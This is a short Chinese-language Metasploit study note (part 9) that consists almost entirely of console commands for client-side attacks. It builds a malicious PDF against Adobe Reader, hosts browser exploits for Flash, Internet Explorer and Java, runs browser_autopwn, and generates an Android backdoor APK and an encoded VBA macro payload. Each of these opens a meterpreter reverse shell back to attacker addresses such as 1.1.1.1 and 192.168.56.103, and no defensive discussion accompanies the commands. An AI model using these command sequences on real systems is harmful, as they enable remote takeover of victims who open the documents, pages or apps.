MSF学习笔记（9）

利用adobe reader漏洞执行payload
构造pdf文件

msf > use exploit/windows/fileformat/adobe_utilprintf msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcpmsf exploit(adobe_utilprintf) > set lhost 1.1.1.1msf exploit(adobe_utilprintf) > exploit 

利用网址构造

msf > use exploit/windows/browser/adobe_utilprintf msf exploit(adobe_utilprintf) > set srvport 80msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcpmsf exploit(adobe_utilprintf) > set lhost 192.168.56.103msf exploit(adobe_utilprintf) > set lport 4445msf exploit(adobe_utilprintf) > set uripath /pdf

flash利用

msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf msf > use exploit/multi/browser/adobe_flash_opaque_background_uaf 

浏览器自动利用

msf > use auxiliary/server/browser_autopwnmsf auxiliary(browser_autopwn) > set srvport 80msf auxiliary(browser_autopwn) > set uripath /msf auxiliary(browser_autopwn) > run

IE浏览器漏洞

msf > use exploit/windows/browser/ms14_064_ole_code_execution 

jre利用漏洞

msf > use exploit/multi/browser/java_jre17_driver_manager msf > use exploit/multi/browser/java_jre17_jmxbeanmsf > use exploit/multi/browser/java_jre17_reflection_types

android后门程序生成

msf > use payload/android/meterpreter/reverse_tcp msf payload(reverse_tcp) > set lhost 1.1.1.1msf payload(reverse_tcp) > generate -f a.apk -p android -t raw 

宏代码生成

root@kali:~/Desktop# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=5555 -e x86/shikata_ga_nai -f vba-exe